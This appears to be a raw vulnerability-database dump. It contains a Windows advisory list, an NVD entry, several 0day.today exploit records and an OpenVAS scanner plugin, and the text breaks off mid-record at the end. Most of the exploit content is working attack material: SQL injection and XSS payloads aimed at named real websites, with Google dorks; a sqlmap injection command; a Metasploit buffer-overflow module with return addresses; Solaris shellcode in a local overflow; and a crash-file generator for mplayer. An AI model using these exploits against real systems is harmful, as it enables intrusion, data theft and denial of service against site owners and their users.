\n[CVE-2018-8468](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8468>) \n[CVE-2018-8393](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8393>) \n[CVE-2018-8445](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8445>) \n[CVE-2018-8337](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8337>) \n[CVE-2018-8446](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8446>) \n[ADV180022](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV180022>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *CVE-IDS*:\n[CVE-2018-8336](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8336>)2.5Warning \n[CVE-2018-8433](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8433>)4.7Warning \n[CVE-2018-8462](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8462>)7.0Warning \n[CVE-2018-8442](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8442>)2.5Warning \n[CVE-2018-8440](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8440>)7.8Warning \n[CVE-2018-8438](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8438>)5.8Warning \n[CVE-2018-8455](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8455>)2.5Warning \n[CVE-2018-8392](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8392>)7.8Warning \n[CVE-2018-8410](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8410>)7.0Warning \n[CVE-2018-8335](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8335>)4.8Warning \n[CVE-2018-8444](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8444>)7.0Warning \n[CVE-2018-8441](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8441>)7.0Warning \n[CVE-2018-8332](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8332>)8.8Warning \n[CVE-2018-0965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0965>)7.6Warning \n[CVE-2018-8422](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8422>)4.7Warning \n[CVE-2018-8271](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8271>)2.5Warning \n[CVE-2018-8437](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8437>)7.6Warning \n[CVE-2018-8443](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8443>)2.5Warning \n[CVE-2018-8475](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8475>)8.8Warning \n[CVE-2018-8419](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8419>)2.5Warning \n[CVE-2018-8434](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8434>)7.6Warning \n[CVE-2018-8420](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8420>)7.5Warning \n[CVE-2018-8436](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8436>)7.6Warning \n[CVE-2018-8439](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8439>)7.6Warning \n[CVE-2018-8449](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8449>)5.3Warning \n[CVE-2018-8435](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8435>)4.2Warning \n[CVE-2018-8424](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8424>)4.7Warning \n[CVE-2018-8468](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8468>)4.3Warning \n[CVE-2018-8393](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8393>)7.8Warning \n[CVE-2018-8445](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8445>)2.5Warning \n[CVE-2018-8337](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8337>)5.3Warning \n[CVE-2018-8446](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8446>)2.5Warning\n\n### *KB list*:\n[4457984](<http://support.microsoft.com/kb/4457984>) \n[4458010](<http://support.microsoft.com/kb/4458010>) \n[4457128](<http://support.microsoft.com/kb/4457128>) \n[4457131](<http://support.microsoft.com/kb/4457131>) \n[4457132](<http://support.microsoft.com/kb/4457132>) \n[4457142](<http://support.microsoft.com/kb/4457142>) \n[4457138](<http://support.microsoft.com/kb/4457138>) \n[4457129](<http://support.microsoft.com/kb/4457129>) \n[4457143](<http://support.microsoft.com/kb/4457143>) \n[4457144](<http://support.microsoft.com/kb/4457144>) \n[4457145](<http://support.microsoft.com/kb/4457145>) \n[4457135](<http://support.microsoft.com/kb/4457135>) \n[4457140](<http://support.microsoft.com/kb/4457140>)\n\n### *Microsoft official advisories*:", "modified": "2019-03-07T00:00:00", "published": "2018-09-11T00:00:00", "id": "KLA11316", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11316", "title": "\r KLA11316Multiple vulnerabilities in Microsoft Windows ", "type": "kaspersky", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cve": [{"lastseen": "2019-04-24T11:29:59", "bulletinFamily": "NVD", "description": "Systems with microprocessors utilizing speculative execution and branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis.", "modified": "2019-04-23T15:30:18", "published": "2018-01-04T08:29:00", "id": "CVE-2017-5753", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-5753", "title": "CVE-2017-5753", "type": "cve", "cvss": {"score": 4.7, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}], "zdt": [{"lastseen": "2018-03-03T01:42:01", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2017-07-20T00:00:00", "published": "2017-07-20T00:00:00", "href": "https://0day.today/exploit/description/28160", "id": "1337DAY-ID-28160", "title": "Joomla JoomRecipe 1.0.4 Component - search_author Parameter SQL Injection Vulnerability", "type": "zdt", "sourceData": "# Exploit Title: Joomla JoomRecipe 1.0.4 Component - Blind SQL Injection Vulnerability\r\n# Date: 20.07.2017\r\n# Exploit Author: Teng\r\n# Vendor Homepage: http://joomboost.com/\r\n# Software Link: https://extensions.joomla.org/extensions/extension/vertical-markets/food-a-beverage/joomrecipe/\r\n# Version: 1.0.4\r\n# Platform: PHP\r\n \r\n1. Description\r\nBlind SQL Injection on Search page, with \"search_author\" parameter (POST)\r\n \r\n2. Proof of concept\r\nsqlmap.py -u \"http://localhost/[PATH]/search/results.html\" -p search_author --data \"searchPerformed=1&task=search&searchword=asd&searchCategories%5B%5D=*&search_cuisine=&searchSeasons=&search_author=1&search_max_prep_hours=2&search_max_prep_minutes=0&search_max_cook_hours=2&search_max_cook_minutes=0&search_min_rate=0&search_max_cost=999¤tIngredient=\" --random-agent --dbs\r\n \r\nParameter: search_author (POST)\r\n Type: boolean-based blind\r\n Title: MySQL >= 5.0 boolean-based blind - Parameter replace\r\n Payload: searchPerformed=1&task=search&searchword=asd&searchCategories[]=*&search_cuisine=&searchSeasons=&search_author=(SELECT (CASE WHEN (8160=8160) THEN 8160 ELSE 8160*(SELECT 8160 FROM INFORMATION_SCHEMA.PLUGINS) END))&search_max_prep_hours=2&search_max_prep_minutes=0&search_max_cook_hours=2&search_max_cook_minutes=0&search_min_rate=0&search_max_cost=999¤tIngredient=\n\n# 0day.today [2018-03-02] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/28160"}, {"lastseen": "2018-01-02T21:08:55", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2012-03-10T00:00:00", "published": "2012-03-10T00:00:00", "id": "1337DAY-ID-17648", "href": "https://0day.today/exploit/description/17648", "type": "zdt", "title": "SRISMS - XSS / SQL Injection Vulnerability", "sourceData": "1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0\r\n0 _ __ __ __ 1\r\n1 /' \\ __ /'__`\\ /\\ \\__ /'__`\\ 0\r\n0 /\\_, \\ ___ /\\_\\/\\_\\ \\ \\ ___\\ \\ ,_\\/\\ \\/\\ \\ _ ___ 1\r\n1 \\/_/\\ \\ /' _ `\\ \\/\\ \\/_/_\\_<_ /'___\\ \\ \\/\\ \\ \\ \\ \\/\\`'__\\ 0\r\n0 \\ \\ \\/\\ \\/\\ \\ \\ \\ \\/\\ \\ \\ \\/\\ \\__/\\ \\ \\_\\ \\ \\_\\ \\ \\ \\/ 1\r\n1 \\ \\_\\ \\_\\ \\_\\_\\ \\ \\ \\____/\\ \\____\\\\ \\__\\\\ \\____/\\ \\_\\ 0\r\n0 \\/_/\\/_/\\/_/\\ \\_\\ \\/___/ \\/____/ \\/__/ \\/___/ \\/_/ 1\r\n1 \\ \\____/ >> Exploit database separated by exploit 0\r\n0 \\/___/ type (local, remote, DoS, etc.) 1\r\n1 1\r\n0 [+] Official Website: http://www.1337day.com 0\r\n1 [+] Support E-mail : mr.inj3ct0r[at]gmail.com 1\r\n0 0\r\n1 ########################################## 1\r\n0 I'm NuxbieCyber Member From Inj3ct0r Team 1\r\n1 ########################################## 0\r\n0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1\r\n\r\n[ SRISMS - SQL Injection Vulnerability ]\r\n\r\n[x] Author : the_cyber_nuxbie\r\n[x] Home : www.thecybernuxbie.com\r\n[x] E-mail : [email\u00a0protected]\r\n[x] Found : 10 March 2012 @ 08:25 PM.\r\n[x] Tested : Back|Track 5.\r\n[x] Dork : inurl:\"/searchviewdetails.php?id=\"\r\n________________________________________________________________________\r\n************************************************************************\r\n\r\n- Info WebApps:\r\nThis Content WebApps Develop By: http://www.srisms.com/webdesigning.html\r\n\r\n- Exploit Report:\r\nhttp://localhost/WebApps/searchviewdetails.php?id=[SQL Injection]\r\n\r\n- Sample WebApps Vuln SQLi:\r\nhttp://gayatrivivahakendram.com/searchviewdetails.php?id=730' + [SQL Injection]\r\nhttp://agtsangham.com/searchviewdetails.php?id=400' + [SQL Injection]\r\nhttp://kapumarriagelinks.com/searchviewdetails.php?id=280' + [SQL Injection]\r\nhttp://visakhamarriagelines.com/searchviewdetails.php?id=8160' + [SQL Injection]\r\nhttp://kyathimarriages.com/searchviewdetails.php?id=780' + [SQL Injection]\r\nhttp://ssmarriagelinks.com/searchviewdetails.php?id=358' + [SQL Injection]\r\nhttp://srisimhadrimarriagelinks.com/searchviewdetails.php?id=568' + [SQL Injection]\r\n\r\n - Google Dork:\r\n inurl:\"/searchviewdetails.php?id=\"\r\n\r\n - Exploit Concept:\r\n http://lokalisasi/searchviewdetails.php?id=[XSS]\r\n\r\n - Sample Web Persistent XSS Vulnerability:\r\n http://gayatrivivahakendram.com/searchviewdetails.php?id=<marquee><h1>XSSed By Nuxbie</h1><marquee> <:- [XSS]\r\n http://kapumarriagelinks.com/searchviewdetails.php?id=<marquee><font color=red size=15>XSSed By Nuxbie</font></marquee> <:- [XSS]\r\n http://visakhamarriagelines.com/searchviewdetails.php?id=<script>alert(31337);</script> <:- [XSS]\r\n http://kyathimarriages.com/searchviewdetails.php?id=<script>alert(31337);</script> <:- [XSS]\r\n\r\n \r\n0day no more...\r\n\"n0 d0rk f0r k1dd10ts\"\r\n\r\n- Curahan Hati:\r\nI want to school college level...\r\n(the biggest obsession = S1 - TI)\r\nBut I do not have a cost...\r\nHelp Me...!!!\r\n\r\n- Greetz:\r\n*** 1337day Inject0r TEAM ***\r\n...:::' All Member & Staff Inject0r TEAM ':::...\r\n\r\n- Greetz To All Exploiters From Indonesian:\r\n[ Member Of Inj3ct0r & Exploit-DB ]\r\nAkatsuchi, AntiSecurity, Arianom, bius, blackraptor, bumble_be, c4uR, cr4wl3r, cyberlog, Don Tukulesto, EA Ngel,\r\neidelweiss, Flyff666, g3mbeLz_YCL, Gendenk, gunslinger_, h4ntu, IbnuSina, irvian, Jack, k3m4n9i, k1ngk0n9, k1tk4t,\r\nk4mtiez, K-159, kecemplungkalen, Mask_magicianz, MISTERFRIBO, M3NW5, Mbah_Semar, mywisdom, Newbie Campuz, NoGe, \r\nNTOS-Team, Oli Bekas, OoN_Boy, Pokeng, r3m1ck, S3T4N, s4va, sikunYuk, SENOT, skulmatic, spykit, Sudden_death,\r\nteam_elite, tempe_mendoan, the_day, tomplixsee, v3n0m, vir0e5, Vrs-hCk, vYc0d, Xr0b0t, y3d1ps, etc... \r\n\r\n\"Kalian Telah Mengharumkan Nama INDONESIA Di Dunia IT-Underground\"\r\n\r\nMe @ March, 10 2012, GMT +08:25 Solo Raya, Indonesian.\r\n\r\n\n\n# 0day.today [2018-01-02] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/17648"}, {"lastseen": "2018-04-08T03:44:41", "bulletinFamily": "exploit", "description": "Exploit for multiple platform in category dos / poc", "modified": "2010-03-18T00:00:00", "published": "2010-03-18T00:00:00", "id": "1337DAY-ID-11353", "href": "https://0day.today/exploit/description/11353", "type": "zdt", "title": "mplayer <= 4.4.1 NULL pointer dereference exploit poc", "sourceData": "=====================================================\r\nmplayer <= 4.4.1 NULL pointer dereference exploit poc\r\n=====================================================\r\n\r\n# Exploit Title: mplayer <= 4.4.1 NULL pointer dereference exploit poc 0 day\r\n# Date: 17/03/2010\r\n# Author: Pietro Oliva\r\n# Software Link:\r\n# Version: <= 4.4.1\r\n# Tested on: ubuntu 9.10 but should work in windows too\r\n# CVE : \r\n \r\n#Program received signal SIGSEGV, Segmentation fault.\r\n#0x081176d8 in af_calc_filter_multiplier ()\r\n#(gdb) disas af_calc_filter_multiplier\r\n#Dump of assembler code for function af_calc_filter_multiplier:\r\n#0x081176d0 <af_calc_filter_multiplier+0>: push %ebp\r\n#0x081176d1 <af_calc_filter_multiplier+1>: mov %esp,%ebp\r\n#0x081176d3 <af_calc_filter_multiplier+3>: fld1 \r\n#0x081176d5 <af_calc_filter_multiplier+5>: mov 0x8(%ebp),%eax\r\n#0x081176d8 <af_calc_filter_multiplier+8>: mov (%eax),%eax ==> mplayer tries to dereference eax, which is a NULL pointer!!! \r\n#0x081176da <af_calc_filter_multiplier+10>: lea 0x0(%esi),%esi\r\n#0x081176e0 <af_calc_filter_multiplier+16>: fmull 0x28(%eax)\r\n#0x081176e3 <af_calc_filter_multiplier+19>: mov 0x18(%eax),%eax\r\n#0x081176e6 <af_calc_filter_multiplier+22>: test %eax,%eax\r\n#0x081176e8 <af_calc_filter_multiplier+24>: jne 0x81176e0 <af_calc_filter_multiplier+16>\r\n#0x081176ea <af_calc_filter_multiplier+26>: pop %ebp\r\n#0x081176eb <af_calc_filter_multiplier+27>: ret \r\n#End of assembler dump.\r\n \r\n# REGISTERS:\r\n#eax 0x0 0 ==========> NULL\r\n#ecx 0xfa157a57 -99255721\r\n#edx 0x1fe0 8160\r\n#ebx 0x8509a08 139500040\r\n#esp 0xbfffe2e8 0xbfffe2e8\r\n#ebp 0xbfffe2e8 0xbfffe2e8\r\n#esi 0x7b84000 129515520\r\n#edi 0xf8000 1015808\r\n#eip 0x81176d8 0x81176d8 <af_calc_filter_multiplier+8>\r\n#eflags 0x10216 [ PF AF IF RF ]\r\n#cs 0x73 115\r\n#ss 0x7b 123\r\n#ds 0x7b 123\r\n#es 0x7b 123\r\n#fs 0x0 0\r\n#gs 0x33 51\r\n \r\n \r\n \r\n#!/usr/bin/perl\r\n \r\nprint \"[+] mplayer <= 4.4.1 NULL pointer dereference exploit poc 0 day by Pietro Oliva\\n\";\r\nprint \"[+] pietroliva[at]gmail[dot]com http://olivapietro.altervista.org\\n\";\r\nprint \"[+] creating crafted file mplayer.wav\\n\";\r\n$buffer=\"\\x52\\x49\\x46\\x46\\x1f\\x04\\x00\\x00\\x57\\x41\\x56\\x45\\x66\\x6d\\x74\\x20\\x10\\x00\\x00\\x00\\x01\\x00\\x1f\";\r\nopen(file,\"> mplayer.wav\");\r\nprint(file $buffer);\r\nprint \"[+] done!\\n\";\r\n\r\n\r\n\n# 0day.today [2018-04-08] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/11353"}, {"lastseen": "2018-02-09T05:16:06", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2008-08-31T00:00:00", "published": "2008-08-31T00:00:00", "id": "1337DAY-ID-3577", "href": "https://0day.today/exploit/description/3577", "type": "zdt", "title": "Words tag script 1.2 (word) Remote SQL Injection Vulnerability", "sourceData": "==============================================================\r\nWords tag script 1.2 (word) Remote SQL Injection Vulnerability\r\n==============================================================\r\n\r\n\r\n\r\n|___________________________________________________|\r\n|\r\n| Words tag script v1.2 (word) Remote SQL Injection Vulnerability\r\n|\r\n|___________________________________________________\r\n|---------------------Hussin X----------------------|\r\n|\r\n| Author: Hussin X\r\n|\r\n|___________________________________________________\r\n| |\r\n|\r\n| DorK : \"Powered by words tag script\"\r\n|___________________________________________________|\r\n\r\nExploit: \r\n________\r\n\r\n\r\nwww.[target].com/Script/index.php?command=claim&word=-401+union+select+concat_ws(user(),version(),database())+config_variables--\r\n\r\n\r\n\r\nL!VE DEMO:\r\n_________\r\n\r\n\r\nhttp://words.sourceworkshop.com/index.php?command=claim&word=-401+union+select+concat_ws(user(),version(),database())+config_variables--\r\n\r\n\r\n________________________\r\n\r\ntable_name : column_name\r\n\r\nconfig_variables:variable_name\r\nconfig_variables:value\r\nconfig_variables:id\r\nconfig_variables:title\r\nconfig_variables:text\r\nconfig_variables:description\r\n_______________________\r\n\r\n\r\n\n# 0day.today [2018-02-09] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/3577"}, {"lastseen": "2018-04-12T05:54:20", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category remote exploits", "modified": "2006-10-29T00:00:00", "published": "2006-10-29T00:00:00", "id": "1337DAY-ID-8774", "href": "https://0day.today/exploit/description/8774", "type": "zdt", "title": "PrivateWire Gateway 3.7 Remote Buffer Overflow Exploit (win32)", "sourceData": "==============================================================\r\nPrivateWire Gateway 3.7 Remote Buffer Overflow Exploit (win32)\r\n==============================================================\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be redistributed\r\n# according to the licenses defined in the Authors field below. In the\r\n# case of an unknown or missing license, this file defaults to the same\r\n# license as the core Framework (dual GPLv2 and Artistic). The latest\r\n# version of the Framework can always be obtained from metasploit.com.\r\n##\r\n\r\n##\r\n# From the author:\r\n# This file may only be distributed as part of the Metasploit Framework.\r\n# Any other use needs a written permission from the author.\r\n##\r\n\r\npackage Msf::Exploit::privatewire_gateway_win32;\r\nuse base \"Msf::Exploit\";\r\nuse strict;\r\nuse Pex::Text;\r\n\r\nmy $advanced = { };\r\n\r\nmy $info =\r\n {\r\n\t'Name' => 'Private Wire Gateway Buffer Overflow (win32)',\r\n\t'Version' => '$Rev$',\r\n\t'Authors' =>\r\n\t [\r\n\t\t'Michael Thumann <mthumann[at]ernw.de>',\r\n\t ],\r\n\t'Arch' => [ 'x86' ],\r\n\t'OS' => [ 'win32' ],\r\n\t'Priv' => 1,\r\n\r\n\t'UserOpts' =>\r\n\t {\r\n\t\t'RHOST' => [1, 'ADDR', 'The target address'],\r\n\t\t'RPORT' => [1, 'PORT', 'The target port', 80],\r\n\t\t'PATH' => [1, 'DATA', 'Installation Path of Privatewire','C:\\Cipgw'],\r\n\t },\r\n\r\n\t'Payload' =>\r\n\t {\r\n\t\t'Space' => 8000,\r\n\t\t'BadChars' => \"\\x00\\x3a\\x26\\x3f\\x25\\x23\\x20\\x0a\\x0d\\x2f\\x2b\\x0b\\x5c\\x1b\",\r\n\t\t'Prepend' => \"\\x81\\xc4\\x54\\xf2\\xff\\xff\", # add esp, -3500\r\n\t },\r\n\r\n\t'Description' => Pex::Text::Freeform(qq{\r\n This exploits a buffer overflow in the ADMCREG.EXE used\r\n in the PrivateWire Online Registration Facility. .\r\n}),\r\n\r\n\t'Refs' =>\r\n\t [\r\n\t\t['BID', '18647'],\r\n\t ],\r\n\r\n\t'DefaultTarget' => 4,\r\n\t'Targets' => [\r\n\t\t['Windows 2000 English SP0', 0x77e3c289], # jmp esp USER32.DLL\r\n\t\t['Windows 2000 English SP1', 0x77e3cb4c], # jmp esp USER32.DLL\r\n\t\t['Windows 2000 English SP2', 0x77e3af64], # jmp esp USER32.DLL\r\n\t\t['Windows 2000 English SP3', 0x77e388a7], # jmp esp USER32.DLL\r\n\t\t['Windows 2000 English SP4', 0x77e3c256], # jmp esp USER32.DLL\r\n\t\t['Windows 2003 English SP0/SP1', 0x77d74c94], # jmp esp USER32.DLL\r\n\t\t['Debugging', 0x41414141], # Crash\r\n\t ],\r\n\r\n\t'Keys' => ['privatewire'],\r\n\r\n\t'DisclosureDate' => 'June 26 2006',\r\n };\r\n\r\nsub new {\r\n\tmy $class = shift;\r\n\tmy $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);\r\n\treturn($self);\r\n}\r\n\r\nsub Exploit\r\n{\r\n\tmy $self = shift;\r\n\tmy $target_host = $self->GetVar('RHOST');\r\n\tmy $target_port = $self->GetVar('RPORT');\r\n\tmy $target_idx = $self->GetVar('TARGET');\r\n\tmy $shellcode = $self->GetVar('EncodedPayload')->Payload;\r\n\tmy $path = $self->GetVar('PATH');\r\n\tmy $path_offset = length($path)-8;\r\n\r\n\tmy $target = $self->Targets->[$target_idx];\r\n\r\n\tmy $pattern = Pex::Text::AlphaNumText(8192);\r\n\tmy $jmp = # add 25 to ecx and jmp\r\n\t \"\\x6a\\x19\".\r\n\t \"\\x58\".\r\n\t \"\\x01\\xc1\".\r\n\t \"\\xff\\xe1\";\r\n\tsubstr($pattern, 0, length($shellcode), $shellcode);\r\n\tsubstr($pattern, 8156- $path_offset, 4, pack('V', $target->[1]));\r\n\tsubstr($pattern, 8160, length($jmp), $jmp);\r\n\r\n\tmy $request = \"GET /\" . $pattern . \" HTTP/1.0\\r\\n\\r\\n\";\r\n\r\n\t$self->PrintLine(sprintf (\"[*] Trying \".$target->[0].\" using jmp esp at 0x%.8x...\", $target->[1]));\r\n\r\n\tmy $s = Msf::Socket::Tcp->new\r\n\t (\r\n\t\t'PeerAddr' => $target_host,\r\n\t\t'PeerPort' => $target_port,\r\n\t\t'LocalPort' => $self->GetVar('CPORT'),\r\n\t );\r\n\tif ($s->IsError) {\r\n\t\t$self->PrintLine('[*] Error creating socket: ' . $s->GetError);\r\n\t\treturn;\r\n\t}\r\n\r\n\t$s->Send($request);\r\n\t$s->Close();\r\n\treturn;\r\n}\r\n\r\n1;\r\n\r\n\n# 0day.today [2018-04-12] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/8774"}, {"lastseen": "2018-02-19T13:26:14", "bulletinFamily": "exploit", "description": "Exploit for solaris platform in category local exploits", "modified": "2001-01-13T00:00:00", "published": "2001-01-13T00:00:00", "id": "1337DAY-ID-7276", "href": "https://0day.today/exploit/description/7276", "type": "zdt", "title": "Solaris 2.5 / 2.5.1 getgrnam() Local Overflow Exploit", "sourceData": "=====================================================\r\nSolaris 2.5 / 2.5.1 getgrnam() Local Overflow Exploit\r\n=====================================================\r\n\r\n\r\n#include <stdio.h>\r\n#include <sys/types.h>\r\n\r\n/*\r\n getgrnam() function overflow.\r\n\r\n works against Solaris 2.5/2.5.1 (SPARC)\r\n default offset should work.\r\n\r\n Pablo Sor, Buenos Aires, Argentina.\r\n [email\u00a0protected]\r\n\r\n*/\r\n\r\nu_char shell[] =\r\n \"\\x82\\x10\\x20\\xca\\xa6\\x1c\\xc0\\x13\\x90\\x0c\\xc0\\x13\\x92\\x0c\\xc0\\x13\"\r\n \"\\xa6\\x04\\xe0\\x01\\x91\\xd4\\xff\\xff\\x2d\\x0b\\xd8\\x9a\\xac\\x15\\xa1\\x6e\"\r\n \"\\x2f\\x0b\\xdc\\xda\\x90\\x0b\\x80\\x0e\\x92\\x03\\xa0\\x08\\x94\\x1a\\x80\\x0a\"\r\n \"\\x9c\\x03\\xa0\\x10\\xec\\x3b\\xbf\\xf0\\xdc\\x23\\xbf\\xf8\\xc0\\x23\\xbf\\xfc\"\r\n \"\\x82\\x10\\x20\\x3b\\x91\\xd4\\xff\\xff\";\r\n\r\nu_long get_sp(void)\r\n{\r\n __asm__(\"mov %sp,%i0 \\n\");\r\n}\r\n\r\nvoid main()\r\n{\r\n long *p;\r\n long addr;\r\n char buf[8300];\r\n int i;\r\n\r\n addr = get_sp()-8096;\r\n printf(\"Jumping to address %p\\n\",addr);\r\n p = (long *) buf;\r\n for (i=0;i<2050;++i) *(p++) = 0xa61cc013;\r\n for (i=0;i<strlen(shell);++i) buf[104+i] = shell[i];\r\n p = (long *) &buf[8160];\r\n for (i=0;i<30;++i) *(p++) = addr;\r\n buf[8280]=0;\r\n execl(\"/usr/bin/newgrp\",\"newgrp\",buf,(char *)0);\r\n}\r\n\r\n\r\n\n# 0day.today [2018-02-19] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/7276"}], "openvas": [{"lastseen": "2018-10-22T16:34:36", "bulletinFamily": "scanner", "description": "QuickHeal is prone to a denial-of-service vulnerability.", "modified": "2018-10-19T00:00:00", "published": "2017-05-02T00:00:00", "id": "OPENVAS:1361412562310107160", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310107160", "title": "QuickHeal CVE-2015-8285 Denial of Service Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_quickheal_dos_May_17.nasl 11982 2018-10-19 08:49:21Z mmartin $\n#\n# QuickHeal CVE-2015-8285 Denial of Service Vulnerability\n#\n# Authors:\n# Tameem Eissa <tameem.eissa@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:quickheal:antivirus_pro\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.107160\");\n script_version(\"$Revision: 11982 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-19 10:49:21 +0200 (Fri, 19 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-05-02 10:28:58 +0200 (Tue, 02 May 2017)\");\n script_cve_id(\"CVE-2015-8285\");\n script_bugtraq_id(97996);\n\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_name(\"QuickHeal CVE-2015-8285 Denial of Service Vulnerability\");\n script_tag(name:\"summary\", value:\"QuickHeal is prone to a denial-of-service vulnerability.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The vulnerability exists in the driver webssx.sys.\");\n script_tag(name:\"impact\", value:\"An attacker can exploit this issue to cause denial-of-service condition.\");\n script_tag(name:\"affected\", value:\"QuickHeal 16.00 is vulnerable\");\n script_tag(name:\"solution\", value:\"Updates are available. Please see the references or vendor advisory for more information.\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/97996\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n\n script_family(\"General\");\n\n script_dependencies(\"gb_quick_heal_av_detect.nasl\");\n script_mandatory_keys(\"QuickHeal/Antivirus6432/Pro/Installed\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\n\nif(!Ver = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_equal(version: Ver, test_version:\"16.00\"))\n{\n report = report_fixed_ver(installed_version:Ver, fixed_version:\"See information supplied by the vendor\");\n security_message(data:report);\n exit( 0 );\n}\n\nexit ( 99 );\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-11-21T13:05:23", "bulletinFamily": "scanner", "description": "This host is installed with Symantec\n Symantec Workspace Streaming and is prone to an information disclosure\n vulnerability.", "modified": "2018-11-21T00:00:00", "published": "2016-07-18T00:00:00", "id": "OPENVAS:1361412562310808586", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310808586", "title": "Symantec Workspace Streaming Information Disclosure Vulnerability", "type": "openvas", "sourceData": 